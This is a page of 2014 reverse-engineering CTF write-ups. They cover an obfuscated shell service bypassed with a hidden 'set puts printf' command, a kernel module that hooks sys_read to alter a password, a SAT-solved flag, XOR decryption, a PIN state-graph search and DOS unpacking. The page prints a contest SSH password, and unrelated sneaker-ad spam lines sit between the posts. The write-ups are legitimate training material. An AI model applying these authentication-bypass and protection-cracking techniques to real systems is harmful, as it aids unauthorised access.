BalalaikaCr3w - reverse

5h311 (reverse 200)

Dil4rd — Sat, 01 Nov 2014 02:00:04 +0000

Category:

Event:

No cON Name CTF Finals 2014

Description: Connect to the service listening at 10.210.8.1:6969 and get the flag.

Solution: We have x86 ELF binary (attached to this writeup). If you open it in disassembler, you will find that it's obfuscated, but strings aren't encrypted:

So, we have something like command interpreter... but the most intresting string is, of course, "flag.txt". Now take a look into function, where this string are used. It's sub_080488D0 which we can call on_cat. Because the only place, where it's used is:

Now it's time to understand obfuscation method:

\\some code ... 
while ( 1 ) {
 while ( 1 )  {
    while ( 1 )    {
      while ( 1 )      {
        while ( 1 )        {
          while ( 1 )          {
            curCmdCode = nextCmdCode;
            ni0 = nextCmdCode - 2044764020;
            if ( nextCmdCode <= 2044764020 )
              break;
            ni1 = curCmdCode - 2044764021;
            if ( curCmdCode == 2044764021 )
              nextCmdCode = -12968513931;
          }
          ni2 = curCmdCode + 2004157958;
          if ( curCmdCode > -2004157958 )
            break;
          ni3 = curCmdCode + 2087107103;
          if ( curCmdCode == -2087107103 )
            nextCmdCode = 646359876;
        }
        v77 = curCmdCode + 1904900740;
        if ( curCmdCode > -1904900740 )
          break;
        v76 = curCmdCode + 2004157957;
        if ( curCmdCode == -2004157957 ) {
          v12 = fprintf(
                  globalStream,
                  "error: permission denied\n",
                  v15,
                  v16,
                  v17,
                  v18,
                  v19,
                  v20,
                  v21);
          v86 = 0;
          nextCmdCode = 1903774409;
          v18 = v12;
        }
      }
      v75 = curCmdCode + 1549151840;
      if ( curCmdCode > -1549151840 )
        break;
      v74 = curCmdCode + 1904900739;
      if ( curCmdCode == -1904900739 ) {
        v14 = fprintf(
                globalStream,
                "error: cannot open flag.txt\n",
                v15,
                v16,
                v17,
                v18,
                v19,
                v20,
                v21);
        v86 = 0;
        nextCmdCode = -1116102172;
        v16 = v14;
      }
    }
    v73 = curCmdCode - 1903774408;
    if ( curCmdCode <= 1903774408 )
      break;
    v35 = curCmdCode - 1903774409;
    if ( curCmdCode == 1903774409 ) {
      v33 = -196240387;
      v32 = -2004157957;
      v3 = fprintf(
             globalStream,
             "error: permission denied\n",
             v15,
             v16,
             v17,
             v18,
             v19,
             v20,
             v21);
      v86 = 0;
      nextCmdCode = v33;
      v31 = v3;
    }
  }
  v72 = curCmdCode + 1488433617;
  if ( curCmdCode > -1488433617 )
    break;
  v71 = curCmdCode + 1549151839;
  if ( curCmdCode == -1549151839 )
    nextCmdCode = -184417779;
}
\\more code...

The original code was divided into blocks, which were divided between states of finite automata. Each state is defined by current state (curCmdCode). The next state is defined by variable nextCmdCode. The only thing we should do to deobfuscate is to find all possible ways in given finite automata. But there is an earsier way: in function named on_cat we can notice one strange thing:

v2 = 799129272;
if (!dword_804E894)
  v2 = 373595890;
nextCmdCode = v2;

this means that next execution flow depends of the value of global variable dword_804E894, which is changed to value 1 only in one place: function, named on_put. Now take a look into function on_put at address 0x0804AC80.

This function checks elements of global array globalVars at address 0x0804E8A8 (it's used to store pairs name&value, entered by user), where first 256 bytes is a name of variable and next 256 is suggested value or vice versa. So lets try to create variable in global array globalVar with name "puts" and value "printf" or vice versa, then type "puts" and "cat flag.txt".... and we will get the flag.

I didn't logging my actions during the ctf so the next code is just a local test:

>ncat 192.168.249.144 6969
#############################################################
#                 Welcome to 5h311.nsa.gov                  #
#        All connections are monitored and recorded         #
# Disconnect IMMEDIATELY if you are not an authorized user! #
#############################################################

$ set puts printf
$ puts
# cat flag.txt
Yahoooo_its_my_flag
#

So the task is done and no deobfuscation has been really needed.

Adidas shoes | Women's Nike Air Jordan 1 trainers - Latest Releases , Ietp

Attachments:

5h311.zip

Gunslinger Joe's Gold (Reversing - 200)

Triff — Fri, 24 Oct 2014 08:00:25 +0000

Category:

reverse

Event:

Hack.lu CTF Quals 2014

Task:

Silly Gunslinger Joe has learned from his mistakes with his private terminal and now tries to remember passwords. But he's gotten more paranoid and chose to develope an additional method: protect all his private stuff with a secure locking mechanism that no one would be able to figure out! He's so confident with this new method that he even started using it to protect all his precious gold. So … we better steal all of it!

SSH: joes_gold@wildwildweb.fluxfingers.net
PORT: 1415
PASSWORD: 1gs67uendsx71xmma8

Solution:

Start with ssh connection to the given server (whatever). In the home directory I found two files: FLAG and gold_stash.

joes_gold@goldstash:~$ ls -la
total 32
drwxr-xr-x 2 joes_gold joes_gold  4096 Oct  6 23:09 .
drwxr-xr-x 3 root      root       4096 Oct  6 22:56 ..
-rw-r--r-- 1 joes_gold joes_gold  3106 Feb 20  2014 .bashrc
-r-------- 1 gold      gold         46 Oct  6 23:04 FLAG
-rwsr-sr-x 1 gold      gold      13186 Oct  6 23:03 gold_stash

So I didn't have enough rights to read FLAG but I sill could run gold_stash and found the way how it can read FLAG for me. I ran gold_stash and it asked me for username and password to authenticate.

joes_gold@goldstash:~$ ./gold_stash
          (_/-------------_______________________)
          `|  /~~~~~~~~~~\                       |
           ;  |--------(-||______________________|
           ;  |--------(-| ____________|
           ;  \__________/'
         _/__         ___;
      ,~~    |  __--~~       Gunslinger Joe's
     '        ~~| (  |       Private Stash of Gold
    '      '~~  `____'
   '      '
  '      `            Password Protection activated!
 '       `
'--------`
Username:
Password:
Authentication failed!

I copied it to my desktop and 'strings' gave me: Joe and omg_joe_is_so_rich were found. Back to server.. enter username and password.. fail.. O_o. Ok, then I tried to check password locally.. and it was correct!

It seems to be time to RE.. but:

nothing new...

Ok, back again to server: I copied gold_stash to /tmp and start it.. password was ok, but suid bit was not copied and I was not able to read FLAG. So, something wreck my input or smth else.. I did 'lsmod' and found one strange module 'joe.ko'.

Then I've started RE it. In short this driver hooks sys_read and modify result of sys_read (name it as usInput) if it matches some conditions. The conditions are:

if (some current_task parameter doesn't match smth) don't change anything;
if (usInput == "omg_joe_is_so_rich") set usInput to encrypt(usInput);
if (encrypt(usInput) == "omg_joe_is_so_rich") set usInput to "omg_joe_is_so_rich".

So I should have found such st that match encrypt(st) == "omg_joe_is_so_rich". Encrypt function code is quite simple:

and valid password can be recieved by the following code:

>>> k0 = '123456789012445678'
>>> k1 = 'omg_joe_is_so_rich'
>>> ''.join([chr((ord(k0[i])^ord(k1[i]))+4) for i in range(len(k0))])
'bcXoc]VkTGrE_oKcXT'

and now...

joes_gold@goldstash:~$ ./gold_stash
          (_/-------------_______________________)
          `|  /~~~~~~~~~~\                       |
           ;  |--------(-||______________________|
           ;  |--------(-| ____________|
           ;  \__________/'
         _/__         ___;
      ,~~    |  __--~~       Gunslinger Joe's
     '        ~~| (  |       Private Stash of Gold
    '      '~~  `____'
   '      '
  '      `            Password Protection activated!
 '       `
'--------`
Username: Joe
Password: bcXoc]VkTGrE_oKcXT
Access granted!
$ cat FLAG
flag{joe_thought_youd_never_find_that_module}

The flag is: flag{joe_thought_youd_never_find_that_module}

Adidas shoes | Women's Designer Sneakers - Luxury Shopping

Attachments:

joe.ko_.zip

gold_stash.zip

SATELLITE RELOADED (reverse 250)

Dor1s — Wed, 15 Oct 2014 06:12:57 +0000

Category:

ppc

reverse

Event:

ASIS CTF Finals 2014

Description

Download this file and find the flag.

Solution

After unziping this file we found that it's x64 ELF. At the main function we see some buffer dexoring:

Lets dexor it and save to file (IDA command line with idapython used):

s = ''
for i in range(10952):
	b = Byte(0x601820+i)
	if b==0:
		break
	s += chr(b ^ (0xd4 + i%2))
open('sat.txt','w').write(s)

The decrypted buffer seems to be a condition for some binary array (full dexored buffer avaliable here):

( a[253] | ! a[218] ) & ( ! a[92] | ! a[46] ) & ( ! a[2] | ! a[285] ) & ( ! a[275] | ! a[256] ) ...

so we can suggest that this array is a binary representation of the flag (295 bits ~ 37 bytes) and everything we need is to find such array a that this condition is true.

Well, this type of problem is well-known as SAT. There are many different solvers for such things in the Internet. We used minisat.

Firstly, we need to convert all conditions to MiniSAT Input Format. You can write short script for that but we did few 'Replace with' at text editor.

Notice that array element with zero index should be substituted by non-zero index because of MiniSAT input format (0 means and of line). We changed 0 index to next after last one - 295. Now our SAT looks like needed and we can do:

$ minisat mysat.txt myout.txt
============================[ Problem Statistics ]=============================
|                                                                             |
|  Number of variables:           295                                         |
|  Number of clauses:             441                                         |
|  Parse time:                   0.00 s                                       |
|  Eliminated clauses:           0.00 Mb                                      |
|  Simplification time:          0.00 s                                       |
|                                                                             |
============================[ Search Statistics ]==============================
| Conflicts |          ORIGINAL         |          LEARNT          | Progress |
|           |    Vars  Clauses Literals |    Limit  Clauses Lit/Cl |          |
===============================================================================
===============================================================================
restarts              : 1
conflicts             : 0              (0 /sec)
decisions             : 1              (0.00 % random) (467 /sec)
propagations          : 294            (137191 /sec)
conflict literals     : 0              ( nan % deleted)
Memory used           : 0.22 MB
CPU time              : 0.002143 s

SATISFIABLE
$ cat myout.txt 
SAT
-1 -2 -3 -4 -5 6 -7 8 -9 10 -11 -12 13 14 -15 16 -17 -18 19 -20 -21 22 -23 24 -25 26 -27 -28 29 30 -31 32 -33 34 35 36 37 38 -39 -40 41 42 -43 -44 45 -46 -47 -48 49 50 -51 -52 -53 -54 -55 56 57 -58 -59 -60 -61 62 -63 -64 65 66 -67 68 69 -70 -71 -72 73 74 -75 76 -77 -78 -79 80 81 -82 -83 84 -85 86 -87 -88 89 90 91 -92 -93 94 -95 -96 97 98 -99 100 -101 102 -103 -104 105 106 -107 108 109 110 -111 112 113 -114 -115 -116 117 118 -119 -120 121 122 123 -124 -125 126 -127 -128 129 130 -131 132 133 -134 -135 -136 137 138 -139 -140 -141 142 -143 144 145 -146 -147 -148 -149 150 -151 -152 153 154 -155 -156 157 -158 -159 160 161 -162 -163 -164 165 -166 -167 168 169 -170 -171 172 -173 174 -175 176 177 -178 -179 -180 -181 182 -183 184 185 -186 -187 188 -189 190 -191 -192 193 194 195 -196 -197 198 -199 200 201 -202 -203 -204 205 -206 -207 208 209 -210 -211 -212 213 -214 -215 -216 217 218 -219 -220 221 -222 -223 -224 225 226 -227 -228 229 230 -231 -232 233 234 -235 -236 -237 -238 -239 240 241 -242 -243 -244 245 -246 -247 -248 249 250 -251 -252 253 254 -255 -256 257 258 -259 260 -261 262 -263 -264 265 266 -267 -268 -269 270 -271 272 273 -274 -275 -276 277 -278 -279 280 281 -282 -283 -284 285 286 -287 288 289 -290 -291 -292 -293 294 295 0

Nice, solution found. Try to convert in to some printable data:

>>> sol = '-1 -2 -3 -4 -5 6 -7 8 -9 10 -11 -12 13 14 -15 16 -17 -18 19 -20 -21 22 -23 24 -25 26 -27 -28 29 30 -31 32 -33 34 35 36 37 38 -39 -40 41 42 -43 -44 45 -46 -47 -48 49 50 -51 -52 -53 -54 -55 56 57 -58 -59 -60 -61 62 -63 -64 65 66 -67 68 69 -70 -71 -72 73 74 -75 76 -77 -78 -79 80 81 -82 -83 84 -85 86 -87 -88 89 90 91 -92 -93 94 -95 -96 97 98 -99 100 -101 102 -103 -104 105 106 -107 108 109 110 -111 112 113 -114 -115 -116 117 118 -119 -120 121 122 123 -124 -125 126 -127 -128 129 130 -131 132 133 -134 -135 -136 137 138 -139 -140 -141 142 -143 144 145 -146 -147 -148 -149 150 -151 -152 153 154 -155 -156 157 -158 -159 160 161 -162 -163 -164 165 -166 -167 168 169 -170 -171 172 -173 174 -175 176 177 -178 -179 -180 -181 182 -183 184 185 -186 -187 188 -189 190 -191 -192 193 194 195 -196 -197 198 -199 200 201 -202 -203 -204 205 -206 -207 208 209 -210 -211 -212 213 -214 -215 -216 217 218 -219 -220 221 -222 -223 -224 225 226 -227 -228 229 230 -231 -232 233 234 -235 -236 -237 -238 -239 240 241 -242 -243 -244 245 -246 -247 -248 249 250 -251 -252 253 254 -255 -256 257 258 -259 260 -261 262 -263 -264 265 266 -267 -268 -269 270 -271 272 273 -274 -275 -276 277 -278 -279 280 281 -282 -283 -284 285 286 -287 288 289 -290 -291 -292 -293 294 295'
>>> sol = sol.split(' ')
>>> res = ''
>>> for c in sol: 
...     if '-' in c: res += '0'
...     else: res += '1'
... 
>>> c
'295'
>>> res
'0000010101001101001001010100110101111100110010001100000110000100110110001101000110010100111001001101010011011101100011001110010011011000110001011000010011001001100010011001010110000101100101001110010110001001100010001100100011001100110000011000100011001100110101001100010110001001100011011000011'
>>> len(res)
295
>>> res = '0' + res[-1] + res[:-1] #move last to first (because [0] index) and add leading zero for padding
>>> hex(int(res, 2))[2:-1].decode('hex')
'ASIS_20a64e957c961a2beae9bb230b351bca'

The flag is ASIS_20a64e957c961a2beae9bb230b351bca.

Sports Shoes | Women's Nike Air Force 1 Shadow trainers - Latest Releases , Ietp

Attachments:

mysat.txt

sat.txt

ASIS CALC (reverse 250)

Dil4rd — Tue, 14 Oct 2014 10:43:06 +0000

Category:

reverse

Event:

ASIS CTF Finals 2014

Description:

Download the file and find the flag.

Solution:

After downloading and uncompresing file we can see that it's x64 ELF binary. When I opened it in IDA, I've found that there are tons of code, which seems to be created by flex (The Fast Lexical Analyzer):

Because I was lazy to analyze this program I desided to make small hack. The flag is a string and it should be returned by program when I enter something. Because this program seems to use "std::operator<<" to ourput everything:

(and strings, in particular), lets find where single char output is used:

Only 2 functions! Go to first one and find:

Char array of 37 symbols... maybe it's flag? Lets check.

Decrypt char array routine is the next:

And my decryption code (IDA command line with idapython used):

Python>#get bytes
a = []
for i in range(37):
	a.append(Byte(0x0401F6D+6+i*7))

#brute single byte xor
import string
for i in range(256):
	t = i
	s = ''
	for el in a:
		t =((t+0x54)^0x84)&0xff
		c = chr(el^t)
		if c not in string.printable:
			break
		s += c
	if len(s)==37 and 'ASIS' in s:
		print(s)
Python>
ASIS_cc605aeae2c9a62fa11ba8ae7fd1301e

Too easy! So, the flag is ASIS_cc605aeae2c9a62fa11ba8ae7fd1301e

affiliate tracking url | Best Selling Air Jordan 1 Mid Light Smoke Grey For Sale 554724-092

yayaya

briskly — Sun, 01 Jun 2014 18:31:59 +0000

Category:

reverse

Event:

SecuInside CTF Quals 2014

After decompilation of given SWF file we have found that the code can be divided in two parts. First one is responsible for moving sections of ELF file from SWF's resources to virtual memory. The second one draws black font picture and small colored blocks. The most intresting thing is that position and size of these small colored blocks are defined from ELF binary.

So we get SWF using Crossbridge. So the swf generating the pictures every n milliseconds, but n is always different, and we just need to sum the frames, to get flag

I tried to find programs like swf2png etc. But all of them were trying to get resources, but not to capture the buidling frames.

After that I tried to capture video using the ffmpeg. But after a lot of failed attemps, I just download the programm that makes screen every N millisecons. I ran this programm with flash file and made 4500 of screens. After that I just summed it using PythonImageLibrary and numpy

from PIL import Image
from PIL.Image import fromarray
from numpy import asarray
from os import listdir

images = []

dirname = "screens"
for i, f in enumerate(listdir(dirname)):
    print i
    image = Image.open("%s/%s" % (dirname, f))
    if i == 0:
        dif = asarray(image)
    elif i % 100 == 0:
        fromarray(dif).save("res/file%s.png" % i)
    else:
        dif = dif + asarray(image)
fromarray(dif).save("file6.png")

This script has generated the flag. I think that we get not all frames but it was enough to get flag

P.S. The most funny part was, that one of my teammates ran swf debuger with that file, and forget about it. And after several hours when he switched back swf debugger app, he have seen the lag, where the frames were summed by debbugger. It was worse picture than that, but it was possible to restore flag i think.

Finally, the flag is: GANADAHAAH

Asics footwear | Sneakers

PIN (reverse 400)

Dil4rd — Wed, 19 Mar 2014 12:35:35 +0000

Category:

reverse

Event:

RuCTF Quals 2014

The task was to reverse file main. This is an executable for MS DOS.

Fortunately, this binary isn't packed and it's logic can be easily understand without dynamic analysis. After few minutes of analysis is becames obvius that this executable set hook for interupt int9 (keyboard handler) and for every input character makes some changes with global variable byte_178. If this variables equals 0x14 then we get success message.

First of all let's take a look at the begging of main function:

There you can see that new int9 handler is function at address loc_103. New int9 handler has nothing intrestin: it takes input key code, increment pointer to input key code and set key code there. It's worth noting that new int9 handler uses it's own local buffer which I called keyboard_buffer and pointer to recently added key code in that buffer (I called it recived_cur_elem_offset).

After setting new int9 handler main function goes to loop at address loc_38E and leave it only when new key code has been added. Let's see what happens when new key is pressed (code of pressed key is in al registger):

So this binary exits when key PgDn pressed and does nothing if pressed any key except keys belong to numbers (key codes can be found there: http://msdn.microsoft.com/en-us/library/aa299374(v=vs.60).aspx). So PIN checking algorithm is the next:

arr_byte_179 = [28, 15, 44, 16, 10, 25, 48, 46, 23, 14, 3, 27, 31, 33, 40, 39, 18, 45, 34, 21, 31, 22, 39, 49, 17, 32, 45, 33, 41, 21, 4, 22, 35, 32, 21, 19, 29, 41, 49, 40, 22, 39, 18, 47, 34, 27, 19, 1, 32, 29, 30, 44, 24, 0, 38, 26, 25, 14, 37, 9, 46, 26, 14, 13, 11, 5, 37, 10, 24, 44, 44, 14, 23, 38, 16, 20, 6, 0, 8, 9, 0, 37, 48, 44, 23, 6, 46, 9, 10, 16, 14, 30, 24, 10, 13, 28, 5, 15, 48, 12, 14, 28, 0, 25, 15, 16, 48, 9, 12, 38, 23, 24, 7, 15, 26, 10, 30, 13, 12, 9, 37, 10, 23, 38, 44, 28, 13, 0, 26, 15, 9, 5, 38, 44, 24, 15, 48, 23, 37, 8, 25, 16, 30, 24, 28, 37, 10, 8, 38, 12, 46, 10, 24, 28, 48, 37, 0, 23, 13, 8, 12, 9, 48, 44, 38, 24, 8, 26, 28, 15, 39, 36, 29, 3, 34, 19, 27, 40, 47, 22, 31, 47, 40, 2, 22, 27, 21, 3, 32, 1, 21, 39, 41, 4, 3, 40, 47, 22, 31, 18, 9, 6, 48, 7, 26, 5, 13, 12, 10, 8, 27, 19, 29, 41, 49, 3, 31, 47, 40, 39, 21, 1, 32, 18, 19, 3, 27, 4, 35, 39, 16, 38, 0, 9, 13, 30, 48, 26, 44, 5, 16, 9, 37, 44, 15, 23, 14, 28, 48, 0, 6, 13, 26, 0, 12, 23, 15, 5, 14, 48, 5, 15, 16, 13, 14, 23, 46, 24, 48, 10, 31, 29, 40, 39, 35, 21, 47, 32, 22, 33, 37, 16, 8, 48, 30, 46, 23, 38, 9, 13, 47, 34, 49, 17, 32, 31, 41, 1, 18, 19, 14, 37, 10, 12, 38, 15, 48, 5, 9, 13, 4, 27, 22, 45, 2, 33, 17, 47, 35, 32, 18, 1, 49, 34, 2, 29, 27, 3, 31, 4, 22, 32, 29, 45, 34, 3, 39, 27, 21, 47, 3, 41, 35, 31, 19, 18, 40, 1, 22, 27, 22, 31, 29, 49, 21, 19, 47, 18, 40, 1, 41, 19, 29, 40, 35, 18, 22, 42, 45, 39, 44, 24, 25, 0, 46, 26, 28, 16, 9, 8, 9, 15, 13, 26, 25, 16, 6, 23, 10, 5, 3, 1, 35, 4, 17, 34, 22, 47, 45, 19, 39, 22, 29, 27, 32, 35, 41, 1, 2, 17, 21, 3, 27, 31, 33, 40, 22, 39, 34, 17, 43, 33, 32, 18, 31, 4, 41, 45, 22, 3, 4, 42, 40, 27, 47, 21, 9, 45, 1, 3, 13, 30, 23, 37, 14, 10, 12, 6, 9, 28, 3, 4, 34, 32, 31, 49, 22, 2, 19, 1, 23, 44, 13, 10, 30, 9, 0, 8, 14, 5, 33, 19, 39, 3, 35, 4, 1, 27, 31, 17, 38, 6, 46, 37, 28, 5, 25, 26, 8, 9, 41, 33, 32, 18, 21, 45, 34, 27, 19, 4]

key_format = '1234567890'

def to_keycodes(key_str):
	if key_str not in key_format:
		print("Invalid key format (only numbers)!")
		return None
	return key_format.index(key_str)+2

def check_key(key):
	glob_byte_178 = 0x16
	for el in key:
		glob_byte_178 = arr_byte_179[glob_byte_178*10 + to_keycodes(el) - 2]
		if glob_byte_178==0x14:
			print("Success! Your key is '"+key+"'")
			return
	print("No...")

The algorithm is quite easy and the only bad news is that array at address 179 isn't a substitution and can't be easily reversed. So we have graph and should find there the way from 0x16 to 0x14. Before searching for some fast algorithm I started simples brute via next algorithm:

import sys

arr_byte_179 = [28, 15, 44, 16, 10, 25, 48, 46, 23, 14, 3, 27, 31, 33, 40, 39, 18, 45, 34, 21, 31, 22, 39, 49, 17, 32, 45, 33, 41, 21, 4, 22, 35, 32, 21, 19, 29, 41, 49, 40, 22, 39, 18, 47, 34, 27, 19, 1, 32, 29, 30, 44, 24, 0, 38, 26, 25, 14, 37, 9, 46, 26, 14, 13, 11, 5, 37, 10, 24, 44, 44, 14, 23, 38, 16, 20, 6, 0, 8, 9, 0, 37, 48, 44, 23, 6, 46, 9, 10, 16, 14, 30, 24, 10, 13, 28, 5, 15, 48, 12, 14, 28, 0, 25, 15, 16, 48, 9, 12, 38, 23, 24, 7, 15, 26, 10, 30, 13, 12, 9, 37, 10, 23, 38, 44, 28, 13, 0, 26, 15, 9, 5, 38, 44, 24, 15, 48, 23, 37, 8, 25, 16, 30, 24, 28, 37, 10, 8, 38, 12, 46, 10, 24, 28, 48, 37, 0, 23, 13, 8, 12, 9, 48, 44, 38, 24, 8, 26, 28, 15, 39, 36, 29, 3, 34, 19, 27, 40, 47, 22, 31, 47, 40, 2, 22, 27, 21, 3, 32, 1, 21, 39, 41, 4, 3, 40, 47, 22, 31, 18, 9, 6, 48, 7, 26, 5, 13, 12, 10, 8, 27, 19, 29, 41, 49, 3, 31, 47, 40, 39, 21, 1, 32, 18, 19, 3, 27, 4, 35, 39, 16, 38, 0, 9, 13, 30, 48, 26, 44, 5, 16, 9, 37, 44, 15, 23, 14, 28, 48, 0, 6, 13, 26, 0, 12, 23, 15, 5, 14, 48, 5, 15, 16, 13, 14, 23, 46, 24, 48, 10, 31, 29, 40, 39, 35, 21, 47, 32, 22, 33, 37, 16, 8, 48, 30, 46, 23, 38, 9, 13, 47, 34, 49, 17, 32, 31, 41, 1, 18, 19, 14, 37, 10, 12, 38, 15, 48, 5, 9, 13, 4, 27, 22, 45, 2, 33, 17, 47, 35, 32, 18, 1, 49, 34, 2, 29, 27, 3, 31, 4, 22, 32, 29, 45, 34, 3, 39, 27, 21, 47, 3, 41, 35, 31, 19, 18, 40, 1, 22, 27, 22, 31, 29, 49, 21, 19, 47, 18, 40, 1, 41, 19, 29, 40, 35, 18, 22, 42, 45, 39, 44, 24, 25, 0, 46, 26, 28, 16, 9, 8, 9, 15, 13, 26, 25, 16, 6, 23, 10, 5, 3, 1, 35, 4, 17, 34, 22, 47, 45, 19, 39, 22, 29, 27, 32, 35, 41, 1, 2, 17, 21, 3, 27, 31, 33, 40, 22, 39, 34, 17, 43, 33, 32, 18, 31, 4, 41, 45, 22, 3, 4, 42, 40, 27, 47, 21, 9, 45, 1, 3, 13, 30, 23, 37, 14, 10, 12, 6, 9, 28, 3, 4, 34, 32, 31, 49, 22, 2, 19, 1, 23, 44, 13, 10, 30, 9, 0, 8, 14, 5, 33, 19, 39, 3, 35, 4, 1, 27, 31, 17, 38, 6, 46, 37, 28, 5, 25, 26, 8, 9, 41, 33, 32, 18, 21, 45, 34, 27, 19, 4]
key_format = '1234567890'

def from_keycodes(keycode):
	if keycode>=2 and keycode<=0xB:
		return key_format[keycode-2]
	else:
		print("Invalid key format (only numbers)!")
		return None

def all_ind_of_el(arr,el):
	ind_arr =[]
	for i in range(len(arr)):
		if arr[i]==el:
			ind_arr.append(i)
	return ind_arr

def excract_prev_states(dw_val):
	res_arr = []
	ells_id = all_ind_of_el(arr_byte_179,dw_val)
	for cur_id  in ells_id:
		loc_val = cur_id + 2
		cur_keycode = (loc_val % 10)
		if cur_keycode==0 or cur_keycode==1:
			cur_keycode = cur_keycode + 10
		prev_dwVal = int((loc_val - cur_keycode)/10)
		res_arr.append([cur_keycode,prev_dwVal])
	return res_arr

MAX_DEPTH = 15
pin = ''
def looper(start_elem,depth):
	global pin
	depth = depth+1
	if depth>MAX_DEPTH:
		return False
	for tt in excract_prev_states(start_elem):
		if tt[1]==0x16 or looper(tt[1], depth)==True:
			print(str(depth)+"\t:\t"+str(tt[1])+"\t:\t"+from_keycodes(tt[0]))
			pin = pin + from_keycodes(tt[0])
			return True
	return False

looper(0x14,0)
print("You pin is "+ pin)

And it has suddenly found a pin "052817506537536". I've entered it in form as flag and recived "Wrong!". So I've started to search an error in my code.. and found more 'valid' pins: "887452817506536", "27452817506536". But there was no flag among them;(

Few minutes later organizers have published hint that the length of pin is 11 symbols. So I've changed MAX_DEPTH to 11 and run next code:

MAX_DEPTH = 11
pin = ''
def looper(start_elem,depth,curpath):
	global pin
	depth = depth+1
	if depth>MAX_DEPTH:
		return False
	curpath = curpath + [start_elem]
	for tt in excract_prev_states(start_elem):
		if tt[1] in curpath:
			continue
		if tt[1]==0x16 or looper(tt[1], depth,curpath)==True:
			print(str(depth)+"\t: "+str(tt[1])+"\t: "+from_keycodes(tt[0]))
			pin = pin + from_keycodes(tt[0])
			return True
	return False

mypath = []
looper(0x14,0,mypath)
print("You pin is "+ pin)

Just in minute I've got the flag: 05281792536.

jordan Sneakers | Sneakers

No harm (reverse 200)

Dil4rd — Tue, 18 Mar 2014 14:19:30 +0000

Category:

reverse

Event:

RuCTF Quals 2014

The task was to find MD5 of the biggets file from the file HARM.DAT, which is the part of game Harm0597 for MS DOS.

First of all let's ask Google to find this game and easily find URL to download it: ftp://78.46.52.48/pub/mags/harm/harm0597.zip

File HARM.DAT has an obvious structure:

struct _FILE_HEADER {
    char magic[32];
    __int32 numSubFiles;
    _PACKED_FILE_HEADER packedFileList[]; 
} FILE_HEADER, *PFILE_HEADER;   // sizeof(_FILE_HEADER) = 32 + 4 + numSubFiles*sizeof(_PACKED_FILE_HEADER)

struct _PACKED_FILE_HEADER {
    char fileNameA[12];
    unsigned char fileType;
    unsigned __int32 fileRealSize;
    unsigned __int32 fileDataOffset;
} PACKED_FILE_HEADE, *PPACKED_FILE_HEADE;  // sizeof(_PACKED_FILE_HEADER) = 12 + 1 + 4 + 4

So we can easily find the biggest file: it's file with name "TRX-DRNK.RUS".

But sum of all _PACKED_FILE_HEADER.fileRealSize is much bigger that file size. This means that some files are compressed.
According to the next info we can make assumption that files with type = 3 are compressed.

	fileId = 21
	fileName = TECHINFO.RUS
	fileType = 0x3
	fileDataOffset = 0xd6d0
	fileDataSize = 0x5000

	fileId = 22
	fileName = YEP.BINO.RUS
	fileType = 0x1
	fileDataOffset = 0xdcca
	fileDataSize = 0x2d0

	fileId = 23
	fileName = NO.BINNO.RUS
	fileType = 0x1
	fileDataOffset = 0xdf9a
	fileDataSize = 0x330

Fortunately, first 2 bytes of compressed files are the size of compressed data. So data of compressed files has the next format:

struct _PACKED_FILE_COMPRESSED_DATA {
    unsigned __int16 dataSize;
    unsigned char    data[];    
} PACKED_FILE_COMPRESSED_DATA, *PPACKED_FILE_COMPRESSED_DATA;   //sizeof(_PACKED_FILE_COMPRESSED_DATA) = 4 + dataSize

Now we can dump file "TRX-DRNK.RUS" and... find nothing ;(

The problem is that I don't know the compression algorithm and this file has non-standard structure (or it's a raw data). Anyway this is my script for parsing HARM.DAT file, just in case.

Now let's start RE HARM.EXE. If you open it in IDA you will find that it's most likely packed..

And packed by pklite! So let's unpack it!

The things we need for that are:

DosBox -- MS Dos emulator (URL: http://www.dosbox.com/download.php?main=1)
PkLite unpacker (we can take program UNP from http://sta.c64.org/dosprg.html)
DosBox debugger (just in case) (can be foud there: http://www.vogons.org/viewtopic.php?t=7323)

And...

the easiest unpacking ever ;)

Now open unpacked file in IDA and start reversing. Using IDA, debugger and script higher we can find that

function sub_1417E returns id of the packed file with given name (call it get_file_id_by_name);
function sub_1422C takes packed file id and address of buffer for uncompressed data (call it get_file_data_by_id).

Here is a part of main function (called PROGRAM in DOS)

Now let's start debugging unpacked program, stop at the beginning and make next changes:

1) set size of newly allocated memory at cs:2428 via "sm cs:2429 ff ff" (allocate memory block of size 0xFFFF)

2) set breakpoint at address cs:2430 (right after call for memory allocation to gather allocated memory address)

3) change file name offset at cs:2469 via "sm cs:246a 9f 22" (cs:229F points to string "TRX-DRNK.RUS")

4) at address cs:2474 set the code

les di,[3176]
push es
push di
call <newSeg8Value>:028C

via "sm cs:2474 c4 3e 76 31 06 57 9a 8c 02 <newSeg8Value.LowByte> <newSeg8Value.HighByte>", where newSeg8Value is the value of seg08 from IDA (0x0608 in my case)

5) set breakpoint at address cs:247F (right after call decompression function to dump decompressed data)

6) continue normal execution, at breapoint 1 remember address of allocated memory ({dx:ax}) and at breakpoint 2 make memory dump via "memdump <allocSeg>:<allocLinAddr> f8a0" (memdump 1e94:0000 f8a0)

Now you can find memory dump in DosBox's folder, convert it to binary data and find it's MD5 which will be the flag: 8C0C4C5F223D9B3822A51EEA0CABD524.

The only reason to make all changes in binary right before execution are relocations. When I've set the number of relocations to 0, my DosBox have crashed.. so I decided that the way above is better that try to guest the reason of DosBox's crash or searching for new DOS emulator:)

Running Sneakers Store | Patike – Nike Air Jordan, Premium, Retro Klasici, Sneakers , Iicf

Arcfour (reverse 500)

Dil4rd — Mon, 17 Mar 2014 12:32:10 +0000

Category:

reverse

Event:

RuCTF Quals 2014

In reverse category this task was the easiest one, except Harm (reverse 10), of course:)

The task was to reverse x86 PE executable. There was 2 ways to solve this task: the easiest one and little more complicated. But let's start with their commom part.

The file seems to be packed by UPX, so start debugging! After unpacking by upx we can find that OEP is at address 0x6d28, but there is a very strange code:

And the address 0x15c3 seems to be the real OEP. So set breakpoint at address 0x4015c3 and dump image using PeTools and ImpREC (my dump avaliable here). Now just open dumped file in IDA.

The first way. If we try to decompile dumped file then we will see next:

So, the lenght of key is 32 bytes. Now let's find where does it checked:

Go to address 0x4011CD, jump little higher to address 0x4010d0 and create a function there. After decompilation of this function we can see that pArgv1 passed to function at address 0x401000, which looks like RC4. After that it compare pArgv1 with local buffer.

signed int __stdcall sub_4010D0()
{
  int v0; // eax@0
  char v1; // cl@1
  unsigned int v2; // eax@1
  signed int v3; // eax@3
  int v5; // [sp+4h] [bp-44h]@1
  char v6; // [sp+8h] [bp-40h]@1
  char pCryptedFlag[32]; // [sp+Ch] [bp-3Ch]@1
  char v8; // [sp+2Ch] [bp-1Ch]@1
